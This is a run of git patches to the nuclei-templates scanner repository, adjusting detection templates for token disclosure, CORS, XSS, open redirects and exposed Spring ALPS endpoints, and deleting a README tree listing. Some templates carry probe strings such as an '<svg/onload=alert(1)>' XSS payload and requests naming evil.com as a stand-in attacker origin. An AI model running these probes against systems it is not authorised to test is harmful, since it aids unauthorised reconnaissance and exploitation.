 5 files changed, 21 insertions(+), 9 deletions(-)

diff --git a/exposed-tokens/generic/credentials-disclosure.yaml b/exposed-tokens/generic/credentials-disclosure.yaml
index 8b1abf976c..8b6e1cb008 100644
--- a/exposed-tokens/generic/credentials-disclosure.yaml
+++ b/exposed-tokens/generic/credentials-disclosure.yaml
@@ -5,10 +5,15 @@ id: credentials-disclosure
 # Severity is not fixed in this case, it varies from none to critical depending upon impact of disclosed key/tokes.
 # Regex count:- 687
 
+# Notes:-
+# This template requires manual inspection once found valid match.
+# Generic token could be anything matching below regex.
+# Impact of leaked token depends on validation of leaked token.
+
 info:
   name: Credentials Disclosure Check
   author: Sy3Omda
-  severity: medium
+  severity: info
   description: Look for multiple keys/tokens/passwords in the page response.
 
 requests:
diff --git a/exposed-tokens/generic/general-tokens.yaml b/exposed-tokens/generic/general-tokens.yaml
index 3923983575..2fbd5e12ea 100644
--- a/exposed-tokens/generic/general-tokens.yaml
+++ b/exposed-tokens/generic/general-tokens.yaml
@@ -1,15 +1,20 @@
-id: general-tokens
+id: generic-tokens
 
 info:
-  name: General Tokens
+  name: Generic Tokens
   author: nadino
-  severity: medium
+  severity: info
 
 requests:
   - method: GET
     path:
       - '{{BaseURL}}'
 
+# Notes:-
+# This template requires manual inspection once found valid match.
+# Generic token could be anything matching below regex.
+# Impact of leaked token depends on validation of leaked token.
+
     matchers-condition: and
     matchers:
       - type: dsl
diff --git a/exposed-tokens/generic/http-username-password.yaml b/exposed-tokens/generic/http-username-password.yaml
index 1c7f4d253f..774dfb8497 100644
--- a/exposed-tokens/generic/http-username-password.yaml
+++ b/exposed-tokens/generic/http-username-password.yaml
@@ -1,13 +1,15 @@
 id: http-username-password
 
 # Extract something like https://username:password@vulnerable.com
-# can be improved
 
 info:
   name: Http usernamme password
   author: nadino
   severity: info
 
+# Notes:-
+# This template requires manual inspection once found valid match.
+
 requests:
   - method: GET
     path:
diff --git a/exposures/apis/swagger-api.yaml b/exposures/apis/swagger-api.yaml
index 8692b19eae..1c064f5792 100644
--- a/exposures/apis/swagger-api.yaml
+++ b/exposures/apis/swagger-api.yaml
@@ -1,4 +1,4 @@
-id: swagger-apis
+id: swagger-api
 
 info:
   name: Swagger API Panel
diff --git a/misconfiguration/unauthenticated-nacos-access.yaml b/misconfiguration/unauthenticated-nacos-access.yaml
index e3f7ffd68d..516f1b6254 100644
--- a/misconfiguration/unauthenticated-nacos-access.yaml
+++ b/misconfiguration/unauthenticated-nacos-access.yaml
@@ -20,9 +20,9 @@ requests:
     matchers:
       - type: regex
         regex:
-          - "username"
-          - "password"
-          - "totalCount"
+          - '"username":'
+          - '"password":'
+          - '"totalCount":'
         condition: and
         part: body
       - type: status

From 1468d8a52c6d10e644b0215e40e283299694a799 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 12:14:22 +0530
Subject: [PATCH 40/85] matcher updates

---
 cves/2019/CVE-2019-7219.yaml                              | 6 +++++-
 cves/2020/CVE-2020-1943.yaml                              | 7 ++++++-
 .../generic}/basic-cors.yaml                              | 7 +++++--
 .../generic}/basic-xss-prober.yaml                        | 5 +++++
 vulnerabilities/generic/top-xss-params.yaml               | 4 ++++
 .../wordpress-emails-verification-for-woocommerce.yaml    | 8 +++++++-
 6 files changed, 32 insertions(+), 5 deletions(-)
 rename {misconfiguration => vulnerabilities/generic}/basic-cors.yaml (66%)
 rename {misconfiguration => vulnerabilities/generic}/basic-xss-prober.yaml (89%)

diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml
index 6fbcfa0e23..fda09ce8cc 100644
--- a/cves/2019/CVE-2019-7219.yaml
+++ b/cves/2019/CVE-2019-7219.yaml
@@ -19,4 +19,8 @@ requests:
       - type: word
         part: header
         words:
-          - "/html"
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml
index 6f7d1d6a1d..aad7fef922 100644
--- a/cves/2020/CVE-2020-1943.yaml
+++ b/cves/2020/CVE-2020-1943.yaml
@@ -16,7 +16,12 @@ requests:
         words:
           - "<svg/onload=alert(1)>"
         part: body
+
       - type: word
         words:
-          - "/html"
+          - "text/html"
         part: header
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/misconfiguration/basic-cors.yaml b/vulnerabilities/generic/basic-cors.yaml
similarity index 66%
rename from misconfiguration/basic-cors.yaml
rename to vulnerabilities/generic/basic-cors.yaml
index 1ebe0fd57d..ad90becaf5 100644
--- a/misconfiguration/basic-cors.yaml
+++ b/vulnerabilities/generic/basic-cors.yaml
@@ -3,16 +3,19 @@ id: basic-cors-misconfig
 info:
   name: Basic CORS misconfiguration
   author: nadino
-  severity: medium
+  severity: low
 
 requests:
   - method: GET
     path:
       - "{{BaseURL}}"
     headers:
-      Origin: "https://evil.com"
+      Origin: https://evil.com
+
     matchers:
       - type: word
         words:
           - "Access-Control-Allow-Origin: https://evil.com"
+          - "Access-Control-Allow-Credentials: true"
+        condition: and
         part: header
diff --git a/misconfiguration/basic-xss-prober.yaml b/vulnerabilities/generic/basic-xss-prober.yaml
similarity index 89%
rename from misconfiguration/basic-xss-prober.yaml
rename to vulnerabilities/generic/basic-xss-prober.yaml
index 67bfb60449..9647e8df66 100644
--- a/misconfiguration/basic-xss-prober.yaml
+++ b/vulnerabilities/generic/basic-xss-prober.yaml
@@ -12,6 +12,7 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e"
+
     matchers-condition: and
     matchers:
       - type: word
@@ -23,3 +24,7 @@ requests:
         words:
           - "text/html"
         part: header
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/vulnerabilities/generic/top-xss-params.yaml b/vulnerabilities/generic/top-xss-params.yaml
index 88cea7c922..70ec33288b 100644
--- a/vulnerabilities/generic/top-xss-params.yaml
+++ b/vulnerabilities/generic/top-xss-params.yaml
@@ -29,3 +29,7 @@ requests:
         words:
           - "text/html"
         part: header
+
+      - type: status
+        status:
+          - 200
\ No newline at end of file
diff --git a/vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml b/vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
index 17f447b87c..3038b1d599 100644
--- a/vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
+++ b/vulnerabilities/wordpress/wordpress-emails-verification-for-woocommerce.yaml
@@ -20,4 +20,10 @@ requests:
       - type: word
         words:
           - "wordpress_logged_in"
-        part: header
\ No newline at end of file
+        part: header
+
+      - type: status
+        status:
+          - 401
+          - 403
+        negative: true
\ No newline at end of file

From c62dfd2b53b9544fa5440fad37b753d51fccc0d3 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 12:28:56 +0530
Subject: [PATCH 41/85] adding few from masters

---
 exposures/files/exposed-alps-spring.yaml      | 31 +++++++++++++++++++
 vulnerabilities/other/thinkific-redirect.yaml | 24 ++++++++++++++
 2 files changed, 55 insertions(+)
 create mode 100644 exposures/files/exposed-alps-spring.yaml
 create mode 100644 vulnerabilities/other/thinkific-redirect.yaml

diff --git a/exposures/files/exposed-alps-spring.yaml b/exposures/files/exposed-alps-spring.yaml
new file mode 100644
index 0000000000..758b046cc7
--- /dev/null
+++ b/exposures/files/exposed-alps-spring.yaml
@@ -0,0 +1,31 @@
+id: exposed-alps-spring
+
+info:
+  name: Exposed Spring Data REST Application-Level Profile Semantics (ALPS)
+  author: dwisiswant0
+  severity: medium
+
+  # https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/profile"
+      - "{{BaseURL}}/api/profile"
+      - "{{BaseURL}}/alps/profile"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "_links"
+          - "/alps/"
+          - "profile"
+        condition: and
+        part: body
+      - type: word
+        words:
+          - "application/hal+json"
+        part: header
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/other/thinkific-redirect.yaml b/vulnerabilities/other/thinkific-redirect.yaml
new file mode 100644
index 0000000000..01d8b2f282
--- /dev/null
+++ b/vulnerabilities/other/thinkific-redirect.yaml
@@ -0,0 +1,24 @@
+id: thinkific-redirect
+
+info:
+  name: Open Redirect vulnerability on thinkific websites
+  author: Gal Nagli
+  severity: Medium
+
+
+requests:
+  - method: GET
+
+    path:
+      - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 302
+      - type: word
+        words:
+          - "<a href=\"http://evil.com?kind=jwt&amp;message=Nil+JSON+web+token\""
+        condition: or
+        part: body

From 101abb2df309887f0b7d3d2e1b7d87f8c26f38f6 Mon Sep 17 00:00:00 2001
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com>
Date: Mon, 11 Jan 2021 13:03:03 +0530
Subject: [PATCH 42/85] Delete README.md

---
 README.md | 520 ------------------------------------------------------
 1 file changed, 520 deletions(-)
 delete mode 100644 README.md

diff --git a/README.md b/README.md
deleted file mode 100644
index 684ca2b63a..0000000000
--- a/README.md
+++ /dev/null
@@ -1,520 +0,0 @@
-
-# Nuclei Templates
-
-[![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT)
-[![GitHub Release](https://img.shields.io/github/release/projectdiscovery/nuclei-templates)](https://github.com/projectdiscovery/nuclei-templates/releases)
-[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/projectdiscovery/nuclei-templates/issues)
-[![Follow on Twitter](https://img.shields.io/twitter/follow/pdnuclei.svg?logo=twitter)](https://twitter.com/pdnuclei)
-[![Chat on Discord](https://img.shields.io/discord/695645237418131507.svg?logo=discord)](https://discord.gg/KECAGdH)
-
-Templates are the core of [nuclei scanner](https://github.com/projectdiscovery/nuclei) which power the actual scanning engine. This repository stores and houses various templates for the scanner provided by our team as well as contributed by the community. We hope that you also contribute by sending templates via **pull requests** or [Github issue](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+) and grow the list.
-
-An overview of the nuclei template directory including number of templates and HTTP request associated with each directory. 
-
-### Nuclei templates `v7.3.7` overview
-
-| Templates          | Counts                           | Templates                 | Counts                                  |
-| ------------------ | -------------------------------- | ------------------------- | --------------------------------------- |
-| cves               | 147             | files                     | 0                     |
-| vulnerabilities    | 0    | panels                    | 0                    |
-| technologies       | 44       | security-misconfiguration | 0 |
-| workflows          | 17          | tokens                    | 0                    |
-| dns                | 6                | fuzzing                   | 6                   |
-| generic-detections | 0 | default-credentials       | 0       |
-| subdomain-takeover | 0 | payloads                  | 0                  |
-| wordlists          | 0          | misc                      | 0                      |
-
-
-### Nuclei templates `v7.3.7` tree overview
-
-<details>
-<summary> Nuclei templates </summary>
-
-```
-├── LICENSE.md
-├── README.md
-├── cves
-│   ├── 2005
-│   │   └── CVE-2005-2428.yaml
-│   ├── 2008
-│   │   └── CVE-2008-2398.yaml
-│   ├── 2013
-│   │   └── CVE-2013-2251.yaml
-│   ├── 2014
-│   │   └── CVE-2014-6271.yaml
-│   ├── 2017
-│   │   ├── CVE-2017-10075.yaml
-│   │   ├── CVE-2017-11444.yaml
-│   │   ├── CVE-2017-12637.yaml
-│   │   ├── CVE-2017-14537.yaml
-│   │   ├── CVE-2017-14849.yaml
-│   │   ├── CVE-2017-5638.yaml
-│   │   ├── CVE-2017-7391.yaml
-│   │   ├── CVE-2017-7615.yaml
-│   │   ├── CVE-2017-9506.yaml
-│   │   └── CVE-2017-9841.yaml
-│   ├── 2018
-│   │   ├── CVE-2018-0296.yaml
-│   │   ├── CVE-2018-1000129.yaml
-│   │   ├── CVE-2018-11409.yaml
-│   │   ├── CVE-2018-11759.yaml
-│   │   ├── CVE-2018-1247.yaml
-│   │   ├── CVE-2018-1271.yaml
-│   │   ├── CVE-2018-1273.yaml
-│   │   ├── CVE-2018-13379.yaml
-│   │   ├── CVE-2018-13380.yaml
-│   │   ├── CVE-2018-14728.yaml
-│   │   ├── CVE-2018-16341.yaml
-│   │   ├── CVE-2018-16763.yaml
-│   │   ├── CVE-2018-17431.yaml
-│   │   ├── CVE-2018-18069.yaml
-│   │   ├── CVE-2018-19386.yaml
-│   │   ├── CVE-2018-19439.yaml
-│   │   ├── CVE-2018-20824.yaml
-│   │   ├── CVE-2018-2791.yaml
-│   │   ├── CVE-2018-3714.yaml
-│   │   ├── CVE-2018-3760.yaml
-│   │   ├── CVE-2018-5230.yaml
-│   │   └── CVE-2018-7490.yaml
-│   ├── 2019
-│   │   ├── CVE-2019-1010287.yaml
-│   │   ├── CVE-2019-10475.yaml
-│   │   ├── CVE-2019-11248.yaml
-│   │   ├── CVE-2019-11510.yaml
-│   │   ├── CVE-2019-11580.yaml
-│   │   ├── CVE-2019-11581.yaml
-│   │   ├── CVE-2019-11869.yaml
-│   │   ├── CVE-2019-12314.yaml
-│   │   ├── CVE-2019-12461.yaml
-│   │   ├── CVE-2019-12593.yaml
-│   │   ├── CVE-2019-12725.yaml
-│   │   ├── CVE-2019-14322.yaml
-│   │   ├── CVE-2019-14696.yaml
-│   │   ├── CVE-2019-14974.yaml
-│   │   ├── CVE-2019-15043.yaml
-│   │   ├── CVE-2019-15107.yaml
-│   │   ├── CVE-2019-15858.yaml
-│   │   ├── CVE-2019-16278.yaml
-│   │   ├── CVE-2019-1653.yaml
-│   │   ├── CVE-2019-16662.yaml
-│   │   ├── CVE-2019-16759-1.yaml
-│   │   ├── CVE-2019-16759.yaml
-│   │   ├── CVE-2019-16920.yaml
-│   │   ├── CVE-2019-17382.yaml
-│   │   ├── CVE-2019-17558.yaml
-│   │   ├── CVE-2019-18394.yaml
-│   │   ├── CVE-2019-19368.yaml
-│   │   ├── CVE-2019-19781.yaml
-│   │   ├── CVE-2019-19908.yaml
-│   │   ├── CVE-2019-19985.yaml
-│   │   ├── CVE-2019-20141.yaml
-│   │   ├── CVE-2019-2588.yaml
-│   │   ├── CVE-2019-2725.yaml
-│   │   ├── CVE-2019-3396.yaml
-│   │   ├── CVE-2019-3402.yaml
-│   │   ├── CVE-2019-3799.yaml
-│   │   ├── CVE-2019-5418.yaml
-│   │   ├── CVE-2019-6112.yaml
-│   │   ├── CVE-2019-6340.yaml
-│   │   ├── CVE-2019-6715.yaml
-│   │   ├── CVE-2019-7256.yaml
-│   │   ├── CVE-2019-7609.yaml
-│   │   ├── CVE-2019-8442.yaml
-│   │   ├── CVE-2019-8449.yaml
-│   │   ├── CVE-2019-8451.yaml
-│   │   ├── CVE-2019-8903.yaml
-│   │   ├── CVE-2019-8982.yaml
-│   │   ├── CVE-2019-9670.yaml
-│   │   ├── CVE-2019-9733.yaml
-│   │   └── CVE-2019-9978.yaml
-│   └── 2020
-│       ├── CVE-2020-0618.yaml
-│       ├── CVE-2020-10148.yaml
-│       ├── CVE-2020-10199.yaml
-│       ├── CVE-2020-10204.yaml
-│       ├── CVE-2020-11034.yaml
-│       ├── CVE-2020-1147.yaml
-│       ├── CVE-2020-11738.yaml
-│       ├── CVE-2020-12116.yaml
-│       ├── CVE-2020-12720.yaml
-│       ├── CVE-2020-13167.yaml
-│       ├── CVE-2020-13942.yaml
-│       ├── CVE-2020-14179.yaml
-│       ├── CVE-2020-14181.yaml
-│       ├── CVE-2020-14864.yaml
-│       ├── CVE-2020-14882.yaml
-│       ├── CVE-2020-15129.yaml
-│       ├── CVE-2020-15505.yaml
-│       ├── CVE-2020-15920.yaml
-│       ├── CVE-2020-16139.yaml
-│       ├── CVE-2020-16846.yaml
-│       ├── CVE-2020-16952.yaml
-│       ├── CVE-2020-17505.yaml
-│       ├── CVE-2020-17506.yaml
-│       ├── CVE-2020-17518.yaml
-│       ├── CVE-2020-17519.yaml
-│       ├── CVE-2020-2096.yaml
-│       ├── CVE-2020-2140.yaml
-│       ├── CVE-2020-23972.yaml
-│       ├── CVE-2020-24223.yaml
-│       ├── CVE-2020-24312.yaml
-│       ├── CVE-2020-2551.yaml
-│       ├── CVE-2020-25540.yaml
-│       ├── CVE-2020-26214.yaml
-│       ├── CVE-2020-3187.yaml
-│       ├── CVE-2020-3452.yaml
-│       ├── CVE-2020-4463.yaml
-│       ├── CVE-2020-5284.yaml
-│       ├── CVE-2020-5405.yaml
-│       ├── CVE-2020-5410.yaml
-│       ├── CVE-2020-5412.yaml
-│       ├── CVE-2020-5776.yaml
-│       ├── CVE-2020-5777.yaml
-│       ├── CVE-2020-5902.yaml
-│       ├── CVE-2020-6287.yaml
-│       ├── CVE-2020-7209.yaml
-│       ├── CVE-2020-7318.yaml
-│       ├── CVE-2020-7961.yaml
-│       ├── CVE-2020-8091.yaml
-│       ├── CVE-2020-8115.yaml
-│       ├── CVE-2020-8163.yaml
-│       ├── CVE-2020-8191.yaml
-│       ├── CVE-2020-8193.yaml
-│       ├── CVE-2020-8194.yaml
-│       ├── CVE-2020-8209.yaml
-│       ├── CVE-2020-8512.yaml
-│       ├── CVE-2020-8982.yaml
-│       ├── CVE-2020-9047.yaml
-│       ├── CVE-2020-9344.yaml
-│       ├── CVE-2020-9484.yaml
-│       ├── CVE-2020-9496.yaml
-│       └── CVE-2020-9757.yaml
-├── default-logins
-│   ├── apache
-│   │   └── tomcat-manager-default.yaml
-│   ├── grafana
-│   │   └── grafana-default-credential.yaml
-│   ├── rabbitmq
-│   │   └── rabbitmq-default-admin.yaml
-│   └── solarwinds
-│       └── solarwinds-default-admin.yaml
-├── dns
-│   ├── azure-takeover-detection.yaml
-│   ├── cname-service-detector.yaml
-│   ├── dead-host-with-cname.yaml
-│   ├── mx-service-detector.yaml
-│   ├── servfail-refused-hosts.yaml
-│   └── spoofable-spf-records-ptr.yaml
-├── exposed-panels
-│   ├── adminer-panel.yaml
-│   ├── aims-password-mgmt-client.yaml
-│   ├── atlassian-crowd-panel.yaml
-│   ├── cisco-asa-panel.yaml
-│   ├── citrix-adc-gateway-detect.yaml
-│   ├── citrix-vpn-detect.yaml
-│   ├── compal-panel.yaml
-│   ├── crxde.yaml
-│   ├── fortinet-fortigate-panel.yaml
-│   ├── fortiweb-panel.yaml
-│   ├── github-enterprise-detect.yaml
-│   ├── gitlab-detect.yaml
-│   ├── globalprotect-panel.yaml
-│   ├── go-anywhere-client.yaml
-│   ├── grafana-detect.yaml
-│   ├── identityguard-selfservice-entrust.yaml
-│   ├── iomega-lenovo-emc-shared-nas-detect.yaml
-│   ├── jira-detect.yaml
-│   ├── jmx-console.yaml
-│   ├── manage-engine-admanager-panel.yaml
-│   ├── mobileiron-login.yaml
-│   ├── netscaler-gateway.yaml
-│   ├── network-camera-detect.yaml
-│   ├── oipm-detect.yaml
-│   ├── parallels-html-client.yaml
-│   ├── phpmyadmin-panel.yaml
-│   ├── polycom-admin-detect.yaml
-│   ├── public-tomcat-instance.yaml
-│   ├── pulse-secure-panel.yaml
-│   ├── rabbitmq-dashboard.yaml
-│   ├── rsa-self-service.yaml
-│   ├── sap-hana-xsengine-panel.yaml
-│   ├── sap-netweaver-detect.yaml
-│   ├── sap-recon-detect.yaml
-│   ├── solarwinds-orion.yaml
-│   ├── sonarqube-login.yaml
-│   ├── sonicwall-management-panel.yaml
-│   ├── sonicwall-sslvpn-panel.yaml
-│   ├── sophos-fw-version-detect.yaml
-│   ├── supervpn-panel.yaml
-│   ├── tikiwiki-cms.yaml
-│   ├── tomcat-manager-pathnormalization.yaml
-│   ├── traefik-dashboard.yaml
-│   ├── virtual-ema-detect.yaml
-│   ├── weave-scope-dashboard-detect.yaml
-│   ├── webeditors.yaml
-│   ├── webmin-panel.yaml
-│   ├── workspace-one-uem.yaml
-│   └── workspaceone-uem-airwatch-dashboard-detect.yaml
-├── exposed-tokens
-│   ├── aws
-│   │   ├── amazon-mws-auth-token-value.yaml
-│   │   └── aws-access-key-value.yaml
-│   ├── generic
-│   │   ├── credentials-disclosure.yaml
-│   │   ├── general-tokens.yaml
-│   │   └── http-username-password.yaml
-│   ├── google
-│   │   ├── fcm-server-key.yaml
-│   │   └── google-api-key.yaml
-│   ├── mailchimp
-│   │   └── mailchimp-api-key.yaml
-│   └── slack
-│       └── slack-access-token.yaml
-├── exposures
-│   ├── apis
-│   │   ├── swagger-api.yaml
-│   │   ├── wadl-api.yaml
-│   │   └── wsdl-api.yaml
-│   ├── backups
-│   │   ├── sql-dump.yaml
-│   │   └── zip-backup-files.yaml
-│   ├── configs
-│   │   ├── composer-config.yaml
-│   │   ├── exposed-svn.yaml
-│   │   ├── git-config-nginxoffbyslash.yaml
-│   │   ├── git-config.yaml
-│   │   ├── htpasswd-detection.yaml
-│   │   ├── laravel-env.yaml
-│   │   ├── magento-config.yaml
-│   │   ├── owncloud-config.yaml
-│   │   ├── package-json.yaml
-│   │   ├── phpinfo.yaml
-│   │   ├── redmine-db-config.yaml
-│   │   ├── server-status-localhost.yaml
-│   │   ├── syfmony-profiler.yaml
-│   │   └── web-config.yaml
-│   ├── files
-│   │   ├── domcfg-page.yaml
-│   │   ├── drupal-install.yaml
-│   │   ├── ds_store.yaml
-│   │   ├── filezilla.yaml
-│   │   ├── lazy-file.yaml
-│   │   ├── server-private-keys.yaml
-│   │   └── xprober-service.yaml
-│   └── logs
-│       ├── elmah-log-file.yaml
-│       ├── error-logs.yaml
-│       └── trace-axd-detect.yaml
-├── fuzzing
-│   ├── arbitrary-file-read.yaml
-│   ├── basic-auth-bruteforce.yaml
-│   ├── directory-traversal.yaml
-│   ├── generic-lfi-fuzzing.yaml
-│   ├── iis-shortname.yaml
-│   └── wp-plugin-scan.yaml
-├── helpers
-│   ├── payloads
-│   │   ├── CVE-2020-5776.csv
-│   │   └── CVE-2020-6287.xml
-│   └── wordlists
-│       └── wp-plugins.txt
-├── miscellaneous
-│   ├── basic-cors-flash.yaml
-│   ├── dir-listing.yaml
-│   ├── htaccess-config.yaml
-│   ├── missing-csp.yaml
-│   ├── missing-hsts.yaml
-│   ├── missing-x-frame-options.yaml
-│   ├── ntlm-directories.yaml
-│   ├── old-copyright.yaml
-│   ├── robots.txt.yaml
-│   ├── security.txt.yaml
-│   ├── trace-method.yaml
-│   ├── unencrypted-bigip-ltm-cookie.yaml
-│   ├── wp-xmlrpc.yaml
-│   └── xml-schema-detect.yaml
-├── misconfiguration
-│   ├── aem-groovyconsole.yaml
-│   ├── apache-tomcat-snoop.yaml
-│   ├── apc-info.yaml
-│   ├── aspx-debug-mode.yaml
-│   ├── aws-redirect.yaml
-│   ├── basic-cors.yaml
-│   ├── basic-xss-prober.yaml
-│   ├── cgi-test-page.yaml
-│   ├── django-debug-detect.yaml
-│   ├── docker-api.yaml
-│   ├── docker-registry.yaml
-│   ├── druid-monitor.yaml
-│   ├── drupal-user-enum-ajax.yaml
-│   ├── drupal-user-enum-redirect.yaml
-│   ├── elasticsearch.yaml
-│   ├── exposed-kibana.yaml
-│   ├── exposed-service-now.yaml
-│   ├── front-page-misconfig.yaml
-│   ├── jkstatus-manager.yaml
-│   ├── jupyter-ipython-unauth.yaml
-│   ├── kubernetes-pods.yaml
-│   ├── larvel-debug.yaml
-│   ├── linkerd-ssrf-detect.yaml
-│   ├── manage-engine-ad-search.yaml
-│   ├── php-errors.yaml
-│   ├── put-method-enabled.yaml
-│   ├── rack-mini-profiler.yaml
-│   ├── salesforce-aura-misconfig.yaml
-│   ├── shell-history.yaml
-│   ├── sidekiq-dashboard.yaml
-│   ├── springboot-detect.yaml
-│   ├── symfony-debugmode.yaml
-│   ├── tomcat-scripts.yaml
-│   ├── unauthenticated-airflow.yaml
-│   ├── unauthenticated-nacos-access.yaml
-│   ├── wamp-xdebug-detect.yaml
-│   └── zenphoto-installation-sensitive-info.yaml
-├── takeovers
-│   └── subdomain-takeover.yaml
-├── technologies
-│   ├── apache-detect.yaml
-│   ├── artica-web-proxy-detect.yaml
-│   ├── basic-auth-detection.yaml
-│   ├── bigip-config-utility-detect.yaml
-│   ├── cacti-detect.yaml
-│   ├── clockwork-php-page.yaml
-│   ├── couchdb-detect.yaml
-│   ├── favicon-detection.yaml
-│   ├── firebase-detect.yaml
-│   ├── google-storage.yaml
-│   ├── graphql.yaml
-│   ├── graylog-api-browser.yaml
-│   ├── home-assistant.yaml
-│   ├── jaspersoft-detect.yaml
-│   ├── jolokia.yaml
-│   ├── kibana-detect.yaml
-│   ├── kong-detect.yaml
-│   ├── liferay-portal-detect.yaml
-│   ├── linkerd-badrule-detect.yaml
-│   ├── lotus-domino-version.yaml
-│   ├── magmi-detect.yaml
-│   ├── mrtg-detect.yaml
-│   ├── netsweeper-webadmin-detect.yaml
-│   ├── nifi-detech.yaml
-│   ├── oidc-detect.yaml
-│   ├── pi-hole-detect.yaml
-│   ├── prometheus-exporter-detect.yaml
-│   ├── prometheus-exposed-panel.yaml
-│   ├── prtg-detect.yaml
-│   ├── redmine-cli-detect.yaml
-│   ├── s3-detect.yaml
-│   ├── sap-netweaver-as-java-detect.yaml
-│   ├── sap-netweaver-detect.yaml
-│   ├── shiro-detect.yaml
-│   ├── sql-server-reporting.yaml
-│   ├── tech-detect.yaml
-│   ├── telerik-dialoghandler-detect.yaml
-│   ├── telerik-fileupload-detect.yaml
-│   ├── terraform-detect.yaml
-│   ├── tomcat-detect.yaml
-│   ├── tor-socks-proxy.yaml
-│   ├── waf-detect.yaml
-│   ├── weblogic-detect.yaml
-│   └── werkzeug-debugger-detect.yaml
-├── vulnerabilities
-│   ├── generic
-│   │   ├── crlf-injection.yaml
-│   │   ├── top-xss-params.yaml
-│   │   └── url-redirect.yaml
-│   ├── ibm
-│   │   ├── eclipse-help-system-xss.yaml
-│   │   └── ibm-infoprint-directory-traversal.yaml
-│   ├── jenkins
-│   │   ├── jenkins-asyncpeople.yaml
-│   │   ├── jenkins-stack-trace.yaml
-│   │   └── unauthenticated-jenkin-dashboard.yaml
-│   ├── jira
-│   │   ├── jira-service-desk-signup.yaml
-│   │   ├── jira-unauthenticated-dashboards.yaml
-│   │   ├── jira-unauthenticated-popular-filters.yaml
-│   │   ├── jira-unauthenticated-projects.yaml
-│   │   └── jira-unauthenticated-user-picker.yaml
-│   ├── moodle
-│   │   ├── moodle-filter-jmol-lfi.yaml
-│   │   └── moodle-filter-jmol-xss.yaml
-│   ├── oracle
-│   │   └── oracle-ebs-bispgraph-file-access.yaml
-│   ├── other
-│   │   ├── bullwark-momentum-series-directory-traversal.yaml
-│   │   ├── cached-aem-pages.yaml
-│   │   ├── couchdb-adminparty.yaml
-│   │   ├── discourse-xss.yaml
-│   │   ├── mcafee-epo-rce.yaml
-│   │   ├── microstrategy-ssrf.yaml
-│   │   ├── mida-eframework-xss.yaml
-│   │   ├── nginx-module-vts-xss.yaml
-│   │   ├── nuuo-nvrmini2-rce.yaml
-│   │   ├── pdf-signer-ssti-to-rce.yaml
-│   │   ├── rce-shellshock-user-agent.yaml
-│   │   ├── rce-via-java-deserialization.yaml
-│   │   ├── rconfig-rce.yaml
-│   │   ├── sick-beard-xss.yaml
-│   │   ├── symantec-messaging-gateway.yaml
-│   │   ├── tikiwiki-reflected-xss.yaml
-│   │   ├── twig-php-ssti.yaml
-│   │   ├── vpms-auth-bypass.yaml
-│   │   ├── wems-manager-xss.yaml
-│   │   └── zms-auth-bypass.yaml
-│   ├── rails
-│   │   └── rails6-xss.yaml
-│   ├── springboot
-│   │   ├── springboot-actuators-jolokia-xxe.yaml
-│   │   └── springboot-h2-db-rce.yaml
-│   ├── vmware
-│   │   ├── vmware-vcenter-lfi-linux.yaml
-│   │   └── vmware-vcenter-lfi.yaml
-│   └── wordpress
-│       ├── easy-wp-smtp-listing.yaml
-│       ├── sassy-social-share.yaml
-│       ├── w3c-total-cache-ssrf.yaml
-│       ├── wordpress-accessible-wpconfig.yaml
-│       ├── wordpress-db-backup.yaml
-│       ├── wordpress-debug-log.yaml
-│       ├── wordpress-directory-listing.yaml
-│       ├── wordpress-emails-verification-for-woocommerce.yaml
-│       ├── wordpress-emergency-script.yaml
-│       ├── wordpress-installer-log.yaml
-│       ├── wordpress-social-metrics-tracker.yaml
-│       ├── wordpress-tmm-db-migrate.yaml
-│       ├── wordpress-user-enumeration.yaml
-│       ├── wordpress-wordfence-xss.yaml
-│       └── wordpress-wpcourses-info-disclosure.yaml
-└── workflows
-    ├── artica-web-proxy-workflow.yaml
-    ├── basic-auth-workflow.yaml
-    ├── bigip-workflow.yaml
-    ├── cisco-asa-workflow.yaml
-    ├── grafana-workflow.yaml
-    ├── jira-workflow.yaml
-    ├── liferay-workflow.yaml
-    ├── lotus-domino-workflow.yaml
-    ├── magmi-workflow.yaml
-    ├── mida-eframework-workflow.yaml
-    ├── netsweeper-workflow.yaml
-    ├── rabbitmq-workflow.yaml
-    ├── sap-netweaver-workflow.yaml
-    ├── solarwinds-orion-workflow.yaml
-    ├── springboot-workflow.yaml
-    ├── vbulletin-workflow.yaml
-    └── wordpress-workflow.yaml
-```
-
-</details>
-
-**49 directories, 424 files**.
-
-Please navigate to https://nuclei.projectdiscovery.io for detailed documentation to build new and your own custom templates and many example templates for easy understanding. 
-
-------
-**Notes:** 
-1. Use YAMLlint (e.g. [yamllint](http://www.yamllint.com/)) to validate new templates when sending pull requests.
-2. Use YAML Formatter (e.g. [jsonformatter](https://jsonformatter.org/yaml-formatter)) to format new templates when sending pull requests.
-
-Thanks again for your contribution and keeping the community vibrant. :heart:

From 2d28f321abe2548a326a6c9e54d487e9ebe43015 Mon Sep 17 00:00:00 2001
